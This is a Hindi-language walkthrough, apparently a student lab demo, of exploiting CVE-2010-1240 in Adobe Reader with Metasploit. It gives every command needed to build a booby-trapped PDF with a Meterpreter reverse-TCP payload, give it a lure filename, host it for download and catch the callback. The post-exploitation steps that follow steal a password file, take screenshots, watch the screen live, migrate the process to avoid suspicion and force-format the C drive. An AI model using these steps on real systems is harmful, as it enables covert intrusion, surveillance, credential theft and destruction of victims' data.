
यह प्रदर्शन वीडियो दिखाता है कि कैसे हम लक्ष्य को एक निर्दोष दिखने वाली PDF फ़ाइल भेजकर पीड़ित के डिवाइस को नियंत्रित कर सकते हैं, जिसमें वास्तव में एम्बेडेड पेलोड होता है। इस एक्सप्लॉइट को CVE-2010-1240 के रूप में सार्वजनिक किया गया था।
आपके लिए लाया गया
यह प्रदर्शन वीडियो दिखाता है कि कैसे हम लक्ष्य को एक निर्दोष दिखने वाली पीडीएफ फाइल भेजकर पीड़ित के डिवाइस को नियंत्रित कर सकते हैं, जिसमें वास्तव में एम्बेडेड पेलोड होता है। इस शोषण को CVE-2010-1240 के रूप में सार्वजनिक किया गया था।
जैसे ही पीडीएफ को Adobe Reader में खोला जाता है, जो उपयोगकर्ता सुरक्षा पॉप-अप पर सहमत होने के लिए हमारे द्वारा धोखा दिए जाते हैं, वे हमें रिवर्स टीसीपी कनेक्शन के माध्यम से उनके उपकरणों से जुड़ा मीटरप्रेटर सत्र प्राप्त करने देते हैं। उस समय तक, उनका सारा डेटा और वे अभी क्या कर रहे हैं, हमारी निगरानी में होते हैं।

सबसे पहले, हम MSFconsole लॉन्च करते हैं जो Metasploit फ्रेमवर्क तक पहुंचने के लिए हमें कमांड लाइन इंटरफेस प्रदान करता है।
msfconsole
फिर, ऐसे एक्सप्लॉइट की खोज करें जो हमारे लक्ष्य Windows प्लेटफॉर्म और Adobe PDF Reader से मेल खाता हो, जहां यह एक्सप्लॉइट्स की एक पूरी सूची प्रदर्शित करेगा जिनका उपयोग पीड़ित की Windows मशीन में घुसपैठ करने और Adobe PDF Reader की कमजोरियों का शोषण करने के लिए किया जा सकता है।
search type:exploit platform:windows adobe pdf
इस शोषण में, हम पीड़ित को हाईजैक करने के लक्ष्य को प्राप्त करने के लिए नीचे दिए गए कमांड का उपयोग करके मॉड्यूल "adobe_pdf_embedded_exe" का चयन और उपयोग करते हैं।
use exploit/windows/fileformat/adobe_pdf_embedded_exe
हम नीचे दिखाए अनुसार “info” कमांड का उपयोग करके एक्सप्लॉइट की जानकारी भी देख सकते हैं:
info
फिर, हम रिवर्स टीसीपी कनेक्शन का उपयोग करने के लिए पेलोड सेट करते हैं। हम Meterpreter का भी उपयोग करते हैं जो एक इंटरैक्टिव शेल प्रदान करता है जो पीड़ित की मशीन का पता लगाने के लिए कोड डालने और निष्पादित करके सभी प्रकार के कार्यों का उपयोग करना आसान बनाता है।
set payload windows/meterpreter/reverse_tcp
फिर, हम सुनने वाले होस्ट और पोर्ट के लिए सेट करेंगे। LHOST के लिए, हमें हमलावर मशीन का IP पता डालना होगा, जो इस मामले में हमारी Kali मशीन का IP पता (10.0.2.4)* है।
*p.s.
इस बीच LPORT के लिए, यह हम पर निर्भर है कि हम एक ऐसा पोर्ट नंबर सेट करें जो सामान्यतः उपयोग नहीं किया जाता है।
# to check Kali machine’s IP address
ifconfig
set LHOST *10.0.2.4*
set LPORT 5665
फिर, हम INFILENAME* फ्लैग के साथ PDF के आधार के लिए इनपुट फ़ाइल सेट करेंगे। इसके बाद, हम फ़ाइलनाम को ऐसा कुछ सेट करेंगे जो पीड़ित की रुचि को आकर्षित करे ताकि वह दुर्भावनापूर्ण PDF फ़ाइल खोल सके।
*p.s.
set INFILENAME '/home/kali/Documents/WIC3004Assignment.pdf'
set FILENAME 'Bawang_Ranger_WIC3004Report.pdf'
हम “exploit” कमांड दर्ज करने से पहले अपने विकल्पों को फिर से देख सकते हैं ताकि PDF के साथ पेलोड उत्पन्न किया जा सके।
# Then we can show the info or options by
show info | show options
exploit
एक बार जब हम PDF फ़ाइल उत्पन्न कर लेते हैं, तो हम फ़ाइल को /var/www/html पर ले जाएंगे जो हमारी Kali मशीन की निर्देशिका है ताकि हम अपने पीड़ित के लिए बाद में PDF फ़ाइल डाउनलोड करने हेतु वेब एप्लिकेशन सर्वर होस्ट कर सकें।
Note:
sudo mv /home/kali/.msf4/local/Bawang_Ranger_WIC3004Report.pdf /var/www/html
फिर, अपना लिसनर सेट करने के लिए, हम "exploit/multi/handler" का उपयोग करेंगे। फिर से, हम पेलोड, LHOST, LPORT को वैसे ही सेट करेंगे जैसे हमने दुर्भावनापूर्ण PDF फ़ाइल उत्पन्न करते समय परिभाषित किया था। फिर हम पेलोड चलाएंगे।
Note:
show info या show options चलाने के लिए वैकल्पिक कमांड है। इसे चलाना अभी आपने जो सेट किया है उसे सत्यापित करने के लिए है।use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 10.0.2.4
set LPORT 5665
[show info | show options]
run
एक अन्य टर्मिनल में, हम Apache सर्वर की स्थिति जांचते हैं ताकि यह सुनिश्चित हो सके कि पीड़ित द्वारा फ़ाइल डाउनलोड करने के लिए हमारी PDF फ़ाइल को /var/www/html में होस्ट करने के लिए यह चल रहा है।
service apache2 status
# If it is inactive, start the service
service apache2 start
Windows मशीन पर, Chrome ब्राउज़र जैसा कोई भी ब्राउज़र खोलें और Kali मशीन के वेब एप्लिकेशन सर्वर तक पहुंचने के लिए हमारा Kali IP (10.0.2.4)* टाइप करें।
*Note: कृपया अपनी स्वयं की Kali मशीन के IP पते पर ध्यान दें
फिर, किसी उपयोगकर्ता की नकल करते हुए इच्छित PDF फ़ाइल सहेजें।
एक बार जब फ़ाइल पीड़ित द्वारा Adobe Reader 8.1.2 में सुरक्षा संदेशों को स्वीकार करने के साथ खोली जाती है, तो हम अपनी Kali मशीन पर देख सकते हैं कि हमारे पास रिवर्स टीसीपी कनेक्शन के माध्यम से एक नया सत्र जुड़ा हुआ है।
वास्तविक दुनिया के परिदृश्य में, हम एम्बेडेड-पेलोड PDF के साथ एक वेबसाइट स्थापित करेंगे ताकि पीड़ित ईमेल के माध्यम से फ़ाइल डाउनलोड या संलग्न कर सके।
फिर, हम पीड़ित की मशीन तक दूरस्थ रूप से पहुंच सकते हैं और फिर मीटरप्रेटर सत्र में हम जो चाहते हैं, वे अधिक दुर्भावनापूर्ण व्यवहार कर सकते हैं।
help
pwd
ls
उदाहरण के लिए, एक फ़ाइल है जिसका नाम password.txt है, हम download password.txt कमांड जारी कर सकते हैं
download [folder name | filename with extension]
बेशक, हम Windows मशीन से जुड़े रहने के लिए दुर्भावनापूर्ण स्क्रिप्ट (बैकडोर प्रत्यारोपण) लिख सकते हैं यदि हम वास्तव में बुरे हैं! 💀
# Boot command prompt at background
execute -f cmd.exe -H -i
# Create file on Windows
echo "You have been hacked" > hack.txt
#open the txt file we have just created
hack.txt
# Take screenshot
screenshot
# Watch the remote user in real time
screenshare
हालांकि, हमलावर मीटरप्रेटर प्रक्रिया को मीटरप्रेटर सत्र में माइग्रेट मॉड्यूल का उपयोग करके एक अलग प्रक्रिया में स्थानांतरित करके संदेह को कम कर सकता है।
meterpreter> run post/windows/manage/migrate
यहां, यह अपने आप पीड़ित की मशीन में एक नई प्रक्रिया उत्पन्न करेगा जिसमें वह स्थानांतरित हो जाएगा। इसके बाद पीड़ित संक्रमित PDF फ़ाइल को हटा सकता है, पूरी तरह से अनजान कि प्रक्रिया पहले ही कहीं और चली गई है।
हमलावर कमांड प्रॉम्प्ट (cmd) या PowerShell का उपयोग करके लक्ष्य मशीन पर दुर्भावनापूर्ण स्क्रिप्ट बना सकता है जो पूरे ऑपरेटिंग सिस्टम को ठीक से काम न करने देने में सक्षम है।
meterpreter> shell
# Start the Windows PowerShell
powershell
#Powershell command to forcefully format the C drive clean.
New-Partition -DiskNumber 1 -UseMaximumSize -AssignDriveLetter C| Format-Volume -DriveLetter C -FileSystemLabel "New"-FileSystem NTFS -Full -Force -Confirm:$false